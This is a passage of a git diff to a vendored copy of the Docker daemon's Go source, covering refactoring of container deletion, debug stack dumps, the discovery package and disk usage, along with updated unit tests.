-// volumes were not supported on windows pre-1.7 -func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { +func getRealPath(path string) (string, error) { + if system.IsIoTCore() { + // Due to https://github.com/golang/go/issues/20506, path expansion + // does not work correctly on the default IoT Core configuration. + // TODO @darrenstahlmsft remove this once golang/go/20506 is fixed + return path, nil + } + return fileutils.ReadSymlinkedDirectory(path) +} + +func (daemon *Daemon) loadRuntimes() error { return nil } -func (daemon *Daemon) setupSeccompProfile() error { +func (daemon *Daemon) initRuntimes(_ map[string]types.Runtime) error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows_test.go b/vendor/github.com/docker/docker/daemon/daemon_windows_test.go new file mode 100644 index 0000000000..a4d8b6a20a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_windows_test.go @@ -0,0 +1,72 @@ +// +build windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "strings" + "testing" + + "golang.org/x/sys/windows/svc/mgr" +) + +const existingService = "Power" + +func TestEnsureServicesExist(t *testing.T) { + m, err := mgr.Connect() + if err != nil { + t.Fatal("failed to connect to service manager, this test needs admin") + } + defer m.Disconnect() + s, err := m.OpenService(existingService) + if err != nil { + t.Fatalf("expected to find known inbox service %q, this test needs a known inbox service to run correctly", existingService) + } + defer s.Close() + + input := []string{existingService} + err = ensureServicesInstalled(input) + if err != nil { + t.Fatalf("unexpected error for input %q: %q", input, err) + } +} + +func TestEnsureServicesExistErrors(t *testing.T) { + m, err := mgr.Connect() + if err != nil { + t.Fatal("failed to connect to service manager, this test needs admin") + } + defer m.Disconnect() + s, err := m.OpenService(existingService) + if err != nil { + 
t.Fatalf("expected to find known inbox service %q, this test needs a known inbox service to run correctly", existingService) + } + defer s.Close() + + for _, testcase := range []struct { + input []string + expectedError string + }{ + { + input: []string{"daemon_windows_test_fakeservice"}, + expectedError: "failed to open service daemon_windows_test_fakeservice", + }, + { + input: []string{"daemon_windows_test_fakeservice1", "daemon_windows_test_fakeservice2"}, + expectedError: "failed to open service daemon_windows_test_fakeservice1", + }, + { + input: []string{existingService, "daemon_windows_test_fakeservice"}, + expectedError: "failed to open service daemon_windows_test_fakeservice", + }, + } { + t.Run(strings.Join(testcase.input, ";"), func(t *testing.T) { + err := ensureServicesInstalled(testcase.input) + if err == nil { + t.Fatalf("expected error for input %v", testcase.input) + } + if !strings.Contains(err.Error(), testcase.expectedError) { + t.Fatalf("expected error %q to contain %q", err.Error(), testcase.expectedError) + } + }) + } +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap.go b/vendor/github.com/docker/docker/daemon/debugtrap.go deleted file mode 100644 index 209048b589..0000000000 --- a/vendor/github.com/docker/docker/daemon/debugtrap.go +++ /dev/null @@ -1,62 +0,0 @@ -package daemon - -import ( - "fmt" - "os" - "path/filepath" - "strings" - "time" - - "github.com/davecgh/go-spew/spew" - "github.com/pkg/errors" -) - -const dataStructuresLogNameTemplate = "daemon-data-%s.log" - -// dumpDaemon appends the daemon datastructures into file in dir and returns full path -// to that file. 
-func (d *Daemon) dumpDaemon(dir string) (string, error) { - // Ensure we recover from a panic as we are doing this without any locking - defer func() { - recover() - }() - - path := filepath.Join(dir, fmt.Sprintf(dataStructuresLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1))) - f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666) - if err != nil { - return "", errors.Wrap(err, "failed to open file to write the daemon datastructure dump") - } - defer f.Close() - - dump := struct { - containers interface{} - names interface{} - links interface{} - execs interface{} - volumes interface{} - images interface{} - layers interface{} - imageReferences interface{} - downloads interface{} - uploads interface{} - registry interface{} - plugins interface{} - }{ - containers: d.containers, - execs: d.execCommands, - volumes: d.volumes, - images: d.imageStore, - layers: d.layerStore, - imageReferences: d.referenceStore, - downloads: d.downloadManager, - uploads: d.uploadManager, - registry: d.RegistryService, - plugins: d.PluginStore, - names: d.nameIndex, - links: d.linkIndex, - } - - spew.Fdump(f, dump) // Does not return an error - f.Sync() - return path, nil -} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go index d650eb7f8c..c8abe69bb6 100644 --- a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go @@ -1,19 +1,19 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "os" "os/signal" - "syscall" - "github.com/Sirupsen/logrus" stackdump "github.com/docker/docker/pkg/signal" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func (d *Daemon) setupDumpStackTrap(root string) { c := make(chan os.Signal, 1) - signal.Notify(c, syscall.SIGUSR1) + signal.Notify(c, unix.SIGUSR1) go func() { for range c { path, err := 
stackdump.DumpStacks(root) @@ -22,12 +22,6 @@ func (d *Daemon) setupDumpStackTrap(root string) { } else { logrus.Infof("goroutine stacks written to %s", path) } - path, err = d.dumpDaemon(root) - if err != nil { - logrus.WithError(err).Error("failed to write daemon datastructure dump") - } else { - logrus.Infof("daemon datastructure dump written to %s", path) - } } }() } diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go index f5b9170907..e83d51f597 100644 --- a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!darwin,!freebsd,!windows,!solaris +// +build !linux,!darwin,!freebsd,!windows -package daemon +package daemon // import "github.com/docker/docker/daemon" func (d *Daemon) setupDumpStackTrap(_ string) { return diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go index fb20c9d2c5..b438d03812 100644 --- a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go +++ b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go @@ -1,52 +1,46 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "os" - "syscall" "unsafe" winio "github.com/Microsoft/go-winio" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/signal" - "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" ) func (d *Daemon) setupDumpStackTrap(root string) { // Windows does not support signals like *nix systems. So instead of // trapping on SIGUSR1 to dump stacks, we wait on a Win32 event to be // signaled. 
ACL'd to builtin administrators and local system - ev := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid()) + event := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid()) + ev, _ := windows.UTF16PtrFromString(event) sd, err := winio.SddlToSecurityDescriptor("D:P(A;;GA;;;BA)(A;;GA;;;SY)") if err != nil { - logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", ev, err.Error()) + logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", event, err.Error()) return } - var sa syscall.SecurityAttributes + var sa windows.SecurityAttributes sa.Length = uint32(unsafe.Sizeof(sa)) sa.InheritHandle = 1 sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) - h, err := system.CreateEvent(&sa, false, false, ev) + h, err := windows.CreateEvent(&sa, 0, 0, ev) if h == 0 || err != nil { - logrus.Errorf("failed to create debug stackdump event %s: %s", ev, err.Error()) + logrus.Errorf("failed to create debug stackdump event %s: %s", event, err.Error()) return } go func() { - logrus.Debugf("Stackdump - waiting signal at %s", ev) + logrus.Debugf("Stackdump - waiting signal at %s", event) for { - syscall.WaitForSingleObject(h, syscall.INFINITE) + windows.WaitForSingleObject(h, windows.INFINITE) path, err := signal.DumpStacks(root) if err != nil { logrus.WithError(err).Error("failed to write goroutines dump") } else { logrus.Infof("goroutine stacks written to %s", path) } - path, err = d.dumpDaemon(root) - if err != nil { - logrus.WithError(err).Error("failed to write daemon datastructure dump") - } else { - logrus.Infof("daemon datastructure dump written to %s", path) - } } }() } diff --git a/vendor/github.com/docker/docker/daemon/delete.go b/vendor/github.com/docker/docker/daemon/delete.go index 6b622bde37..2ccbff05fb 100644 --- a/vendor/github.com/docker/docker/daemon/delete.go +++ b/vendor/github.com/docker/docker/daemon/delete.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( 
"fmt" @@ -7,12 +7,12 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" "github.com/docker/docker/container" - "github.com/docker/docker/layer" - volumestore "github.com/docker/docker/volume/store" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerRm removes the container id from the filesystem. An error @@ -29,7 +29,7 @@ func (daemon *Daemon) ContainerRm(name string, config *types.ContainerRmConfig) // Container state RemovalInProgress should be used to avoid races. if inProgress := container.SetRemovalInProgress(); inProgress { err := fmt.Errorf("removal of container %s is already in progress", name) - return errors.NewBadRequestError(err) + return errdefs.Conflict(err) } defer container.ResetRemovalInProgress() @@ -58,7 +58,7 @@ func (daemon *Daemon) rmLink(container *container.Container, name string) error } parent = strings.TrimSuffix(parent, "/") - pe, err := daemon.nameIndex.Get(parent) + pe, err := daemon.containersReplica.Snapshot().GetID(parent) if err != nil { return fmt.Errorf("Cannot get parent %s for name %s", parent, name) } @@ -79,90 +79,74 @@ func (daemon *Daemon) rmLink(container *container.Container, name string) error func (daemon *Daemon) cleanupContainer(container *container.Container, forceRemove, removeVolume bool) (err error) { if container.IsRunning() { if !forceRemove { - err := fmt.Errorf("You cannot remove a running container %s. Stop the container before attempting removal or use -f", container.ID) - return errors.NewRequestConflictError(err) + state := container.StateString() + procedure := "Stop the container before attempting removal or force remove" + if state == "paused" { + procedure = "Unpause and then " + strings.ToLower(procedure) + } + err := fmt.Errorf("You cannot remove a %s container %s. 
%s", state, container.ID, procedure) + return errdefs.Conflict(err) } if err := daemon.Kill(container); err != nil { return fmt.Errorf("Could not kill running container %s, cannot remove - %v", container.ID, err) } } + if !system.IsOSSupported(container.OS) { + return fmt.Errorf("cannot remove %s: %s ", container.ID, system.ErrNotSupportedOperatingSystem) + } // stop collection of stats for the container regardless // if stats are currently getting collected. - daemon.statsCollector.stopCollection(container) + daemon.statsCollector.StopCollection(container) if err = daemon.containerStop(container, 3); err != nil { return err } // Mark container dead. We don't want anybody to be restarting it. - container.SetDead() + container.Lock() + container.Dead = true // Save container state to disk. So that if error happens before // container meta file got removed from disk, then a restart of // docker should not make a dead container alive. - if err := container.ToDiskLocking(); err != nil && !os.IsNotExist(err) { + if err := container.CheckpointTo(daemon.containersReplica); err != nil && !os.IsNotExist(err) { logrus.Errorf("Error saving dying container to disk: %v", err) } - - // If force removal is required, delete container from various - // indexes even if removal failed. 
- defer func() { - if err == nil || forceRemove { - daemon.nameIndex.Delete(container.ID) - daemon.linkIndex.delete(container) - selinuxFreeLxcContexts(container.ProcessLabel) - daemon.idIndex.Delete(container.ID) - daemon.containers.Delete(container.ID) - if e := daemon.removeMountPoints(container, removeVolume); e != nil { - logrus.Error(e) - } - daemon.LogContainerEvent(container, "destroy") - } - }() - - if err = os.RemoveAll(container.Root); err != nil { - return fmt.Errorf("Unable to remove filesystem for %v: %v", container.ID, err) - } + container.Unlock() // When container creation fails and `RWLayer` has not been created yet, we // do not call `ReleaseRWLayer` if container.RWLayer != nil { - metadata, err := daemon.layerStore.ReleaseRWLayer(container.RWLayer) - layer.LogReleaseMetadata(metadata) - if err != nil && err != layer.ErrMountDoesNotExist { - return fmt.Errorf("Driver %s failed to remove root filesystem %s: %s", daemon.GraphDriverName(), container.ID, err) + err := daemon.imageService.ReleaseLayer(container.RWLayer, container.OS) + if err != nil { + err = errors.Wrapf(err, "container %s", container.ID) + container.SetRemovalError(err) + return err } + container.RWLayer = nil } - return nil -} - -// VolumeRm removes the volume with the given name. 
-// If the volume is referenced by a container it is not removed -// This is called directly from the Engine API -func (daemon *Daemon) VolumeRm(name string, force bool) error { - err := daemon.volumeRm(name) - if err == nil || force { - daemon.volumes.Purge(name) - return nil + if err := system.EnsureRemoveAll(container.Root); err != nil { + e := errors.Wrapf(err, "unable to remove filesystem for %s", container.ID) + container.SetRemovalError(e) + return e } - return err -} -func (daemon *Daemon) volumeRm(name string) error { - v, err := daemon.volumes.Get(name) - if err != nil { - return err + linkNames := daemon.linkIndex.delete(container) + selinuxFreeLxcContexts(container.ProcessLabel) + daemon.idIndex.Delete(container.ID) + daemon.containers.Delete(container.ID) + daemon.containersReplica.Delete(container) + if e := daemon.removeMountPoints(container, removeVolume); e != nil { + logrus.Error(e) } - - if err := daemon.volumes.Remove(v); err != nil { - if volumestore.IsInUse(err) { - err := fmt.Errorf("Unable to remove volume, volume still in use: %v", err) - return errors.NewRequestConflictError(err) - } - return fmt.Errorf("Error while removing volume %s: %v", name, err) + for _, name := range linkNames { + daemon.releaseName(name) } - daemon.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()}) + container.SetRemoved() + stateCtr.del(container.ID) + + daemon.LogContainerEvent(container, "destroy") return nil } diff --git a/vendor/github.com/docker/docker/daemon/delete_test.go b/vendor/github.com/docker/docker/daemon/delete_test.go index 1fd27e1ffa..d600917b0c 100644 --- a/vendor/github.com/docker/docker/daemon/delete_test.go +++ b/vendor/github.com/docker/docker/daemon/delete_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -9,35 +9,87 @@ import ( "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" 
"github.com/docker/docker/container" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -func TestContainerDoubleDelete(t *testing.T) { +func newDaemonWithTmpRoot(t *testing.T) (*Daemon, func()) { tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmp) - daemon := &Daemon{ + assert.NilError(t, err) + d := &Daemon{ repository: tmp, root: tmp, } - daemon.containers = container.NewMemoryStore() - - container := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "test", - State: container.NewState(), - Config: &containertypes.Config{}, - }, + d.containers = container.NewMemoryStore() + return d, func() { os.RemoveAll(tmp) } +} + +func newContainerWithState(state *container.State) *container.Container { + return &container.Container{ + ID: "test", + State: state, + Config: &containertypes.Config{}, + } +} + +// TestContainerDelete tests that a useful error message and instructions is +// given when attempting to remove a container (#30842) +func TestContainerDelete(t *testing.T) { + tt := []struct { + errMsg string + fixMsg string + initContainer func() *container.Container + }{ + // a paused container + { + errMsg: "cannot remove a paused container", + fixMsg: "Unpause and then stop the container before attempting removal or force remove", + initContainer: func() *container.Container { + return newContainerWithState(&container.State{Paused: true, Running: true}) + }}, + // a restarting container + { + errMsg: "cannot remove a restarting container", + fixMsg: "Stop the container before attempting removal or force remove", + initContainer: func() *container.Container { + c := newContainerWithState(container.NewState()) + c.SetRunning(0, true) + c.SetRestarting(&container.ExitStatus{}) + return c + }}, + // a running container + { + errMsg: "cannot remove a running container", + fixMsg: "Stop the container before attempting removal or force remove", + initContainer: func() 
*container.Container { + return newContainerWithState(&container.State{Running: true}) + }}, } - daemon.containers.Add(container.ID, container) + + for _, te := range tt { + c := te.initContainer() + d, cleanup := newDaemonWithTmpRoot(t) + defer cleanup() + d.containers.Add(c.ID, c) + + err := d.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: false}) + assert.Check(t, is.ErrorContains(err, te.errMsg)) + assert.Check(t, is.ErrorContains(err, te.fixMsg)) + } +} + +func TestContainerDoubleDelete(t *testing.T) { + c := newContainerWithState(container.NewState()) // Mark the container as having a delete in progress - container.SetRemovalInProgress() + c.SetRemovalInProgress() + + d, cleanup := newDaemonWithTmpRoot(t) + defer cleanup() + d.containers.Add(c.ID, c) // Try to remove the container when its state is removalInProgress. // It should return an error indicating it is under removal progress. - if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true}); err == nil { - t.Fatalf("expected err: %v, got nil", fmt.Sprintf("removal of container %s is already in progress", container.ID)) - } + err := d.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true}) + assert.Check(t, is.ErrorContains(err, fmt.Sprintf("removal of container %s is already in progress", c.ID))) } diff --git a/vendor/github.com/docker/docker/daemon/dependency.go b/vendor/github.com/docker/docker/daemon/dependency.go new file mode 100644 index 0000000000..45275dbf4c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/dependency.go @@ -0,0 +1,17 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/swarmkit/agent/exec" +) + +// SetContainerDependencyStore sets the dependency store backend for the container +func (daemon *Daemon) SetContainerDependencyStore(name string, store exec.DependencyGetter) error { + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + + c.DependencyStore = store + + 
return nil +} diff --git a/vendor/github.com/docker/docker/daemon/discovery.go b/vendor/github.com/docker/docker/daemon/discovery/discovery.go similarity index 83% rename from vendor/github.com/docker/docker/daemon/discovery.go rename to vendor/github.com/docker/docker/daemon/discovery/discovery.go index ee4ea875b7..092c57638a 100644 --- a/vendor/github.com/docker/docker/daemon/discovery.go +++ b/vendor/github.com/docker/docker/daemon/discovery/discovery.go @@ -1,14 +1,13 @@ -package daemon +package discovery // import "github.com/docker/docker/daemon/discovery" import ( "errors" "fmt" - "reflect" "strconv" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/discovery" + "github.com/sirupsen/logrus" // Register the libkv backends for discovery. _ "github.com/docker/docker/pkg/discovery/kv" @@ -21,9 +20,11 @@ const ( defaultDiscoveryTTLFactor = 3 ) -var errDiscoveryDisabled = errors.New("discovery is disabled") +// ErrDiscoveryDisabled is an error returned if the discovery is disabled +var ErrDiscoveryDisabled = errors.New("discovery is disabled") -type discoveryReloader interface { +// Reloader is the discovery reloader of the daemon +type Reloader interface { discovery.Watcher Stop() Reload(backend, address string, clusterOpts map[string]string) error @@ -80,8 +81,7 @@ func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration, ttl = time.Duration(t) * time.Second if _, ok := clusterOpts["discovery.heartbeat"]; !ok { - h := int(t / defaultDiscoveryTTLFactor) - heartbeat = time.Duration(h) * time.Second + heartbeat = time.Duration(t) * time.Second / time.Duration(defaultDiscoveryTTLFactor) } if ttl <= heartbeat { @@ -93,9 +93,9 @@ func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration, return heartbeat, ttl, nil } -// initDiscovery initializes the nodes discovery subsystem by connecting to the specified backend +// Init initializes the nodes discovery subsystem by connecting to the specified backend // 
and starts a registration loop to advertise the current node under the specified address. -func initDiscovery(backendAddress, advertiseAddress string, clusterOpts map[string]string) (discoveryReloader, error) { +func Init(backendAddress, advertiseAddress string, clusterOpts map[string]string) (Reloader, error) { heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts) if err != nil { return nil, err @@ -121,6 +121,8 @@ func (d *daemonDiscoveryReloader) advertiseHeartbeat(address string) { if err := d.initHeartbeat(address); err == nil { ready = true close(d.readyCh) + } else { + logrus.WithError(err).Debug("First discovery heartbeat failed") } for { @@ -198,18 +200,3 @@ func parseDiscoveryOptions(backendAddress string, clusterOpts map[string]string) } return heartbeat, backend, nil } - -// modifiedDiscoverySettings returns whether the discovery configuration has been modified or not. -func modifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool { - if config.ClusterStore != backendType || config.ClusterAdvertise != advertise { - return true - } - - if (config.ClusterOpts == nil && clusterOpts == nil) || - (config.ClusterOpts == nil && len(clusterOpts) == 0) || - (len(config.ClusterOpts) == 0 && clusterOpts == nil) { - return false - } - - return !reflect.DeepEqual(config.ClusterOpts, clusterOpts) -} diff --git a/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go new file mode 100644 index 0000000000..c354a2918d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go @@ -0,0 +1,96 @@ +package discovery // import "github.com/docker/docker/daemon/discovery" + +import ( + "fmt" + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDiscoveryOptsErrors(t *testing.T) { + var testcases = []struct { + doc string + opts map[string]string + }{ + { + 
doc: "discovery.ttl < discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"}, + }, + { + doc: "discovery.ttl == discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"}, + }, + { + doc: "negative discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"}, + }, + { + doc: "negative discovery.ttl", + opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"}, + }, + { + doc: "invalid discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "invalid"}, + }, + { + doc: "invalid discovery.ttl", + opts: map[string]string{"discovery.ttl": "invalid"}, + }, + } + + for _, testcase := range testcases { + _, _, err := discoveryOpts(testcase.opts) + assert.Check(t, is.ErrorContains(err, ""), testcase.doc) + } +} + +func TestDiscoveryOpts(t *testing.T) { + clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"} + heartbeat, ttl, err := discoveryOpts(clusterOpts) + assert.NilError(t, err) + assert.Check(t, is.Equal(10*time.Second, heartbeat)) + assert.Check(t, is.Equal(20*time.Second, ttl)) + + clusterOpts = map[string]string{"discovery.heartbeat": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + assert.NilError(t, err) + assert.Check(t, is.Equal(10*time.Second, heartbeat)) + assert.Check(t, is.Equal(10*defaultDiscoveryTTLFactor*time.Second, ttl)) + + clusterOpts = map[string]string{"discovery.ttl": "30"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + assert.NilError(t, err) + + if ttl != 30*time.Second { + t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl) + } + + expected := 30 * time.Second / defaultDiscoveryTTLFactor + if heartbeat != expected { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat) + } + + discoveryTTL := fmt.Sprintf("%d", defaultDiscoveryTTLFactor-1) + clusterOpts = map[string]string{"discovery.ttl": discoveryTTL} + 
heartbeat, _, err = discoveryOpts(clusterOpts) + if err == nil && heartbeat == 0 { + t.Fatal("discovery.heartbeat must be positive") + } + + clusterOpts = map[string]string{} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if heartbeat != defaultDiscoveryHeartbeat { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat) + } + + expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor + if ttl != expected { + t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) + } +} diff --git a/vendor/github.com/docker/docker/daemon/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery_test.go deleted file mode 100644 index 336973c516..0000000000 --- a/vendor/github.com/docker/docker/daemon/discovery_test.go +++ /dev/null @@ -1,164 +0,0 @@ -package daemon - -import ( - "testing" - "time" -) - -func TestDiscoveryOpts(t *testing.T) { - clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"} - heartbeat, ttl, err := discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("discovery.ttl < discovery.heartbeat must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("discovery.ttl == discovery.heartbeat must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("negative discovery.heartbeat must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("negative discovery.ttl must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "invalid"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("invalid discovery.heartbeat must fail") - } 
- - clusterOpts = map[string]string{"discovery.ttl": "invalid"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("invalid discovery.ttl must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if heartbeat != 10*time.Second { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) - } - - if ttl != 20*time.Second { - t.Fatalf("TTL - Expected : %v, Actual : %v", 20*time.Second, ttl) - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if heartbeat != 10*time.Second { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) - } - - expected := 10 * defaultDiscoveryTTLFactor * time.Second - if ttl != expected { - t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) - } - - clusterOpts = map[string]string{"discovery.ttl": "30"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if ttl != 30*time.Second { - t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl) - } - - expected = 30 * time.Second / defaultDiscoveryTTLFactor - if heartbeat != expected { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat) - } - - clusterOpts = map[string]string{} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if heartbeat != defaultDiscoveryHeartbeat { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat) - } - - expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor - if ttl != expected { - t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) - } -} - -func TestModifiedDiscoverySettings(t *testing.T) { - cases := []struct { - current *Config - modified *Config - expected bool - }{ - { - 
current: discoveryConfig("foo", "bar", map[string]string{}), - modified: discoveryConfig("foo", "bar", map[string]string{}), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), - modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", map[string]string{}), - modified: discoveryConfig("foo", "bar", nil), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("foo", "bar", map[string]string{}), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("baz", "bar", nil), - expected: true, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("foo", "baz", nil), - expected: true, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), - expected: true, - }, - } - - for _, c := range cases { - got := modifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts) - if c.expected != got { - t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified) - } - } -} - -func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config { - return &Config{ - CommonConfig: CommonConfig{ - ClusterStore: backendAddr, - ClusterAdvertise: advertiseAddr, - ClusterOpts: opts, - }, - } -} diff --git a/vendor/github.com/docker/docker/daemon/disk_usage.go b/vendor/github.com/docker/docker/daemon/disk_usage.go index c3b918660d..5bec60d174 100644 --- a/vendor/github.com/docker/docker/daemon/disk_usage.go +++ b/vendor/github.com/docker/docker/daemon/disk_usage.go @@ -1,40 +1,21 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" + "sync/atomic" - "github.com/Sirupsen/logrus" - 
"github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/directory" - "github.com/docker/docker/volume" ) -func (daemon *Daemon) getLayerRefs() map[layer.ChainID]int { - tmpImages := daemon.imageStore.Map() - layerRefs := map[layer.ChainID]int{} - for id, img := range tmpImages { - dgst := digest.Digest(id) - if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { - continue - } - - rootFS := *img.RootFS - rootFS.DiffIDs = nil - for _, id := range img.RootFS.DiffIDs { - rootFS.Append(id) - chid := rootFS.ChainID() - layerRefs[chid]++ - } +// SystemDiskUsage returns information about the daemon data disk usage +func (daemon *Daemon) SystemDiskUsage(ctx context.Context) (*types.DiskUsage, error) { + if !atomic.CompareAndSwapInt32(&daemon.diskUsageRunning, 0, 1) { + return nil, fmt.Errorf("a disk usage operation is already running") } + defer atomic.StoreInt32(&daemon.diskUsageRunning, 0) - return layerRefs -} - -// SystemDiskUsage returns information about the daemon data disk usage -func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) { // Retrieve container list allContainers, err := daemon.Containers(&types.ContainerListOptions{ Size: true, @@ -45,56 +26,25 @@ func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) { } // Get all top images with extra attributes - allImages, err := daemon.Images(filters.NewArgs(), false, true) + allImages, err := daemon.imageService.Images(filters.NewArgs(), false, true) if err != nil { return nil, fmt.Errorf("failed to retrieve image list: %v", err) } - // Get all local volumes - allVolumes := []*types.Volume{} - getLocalVols := func(v volume.Volume) error { - name := v.Name() - refs := daemon.volumes.Refs(v) - - 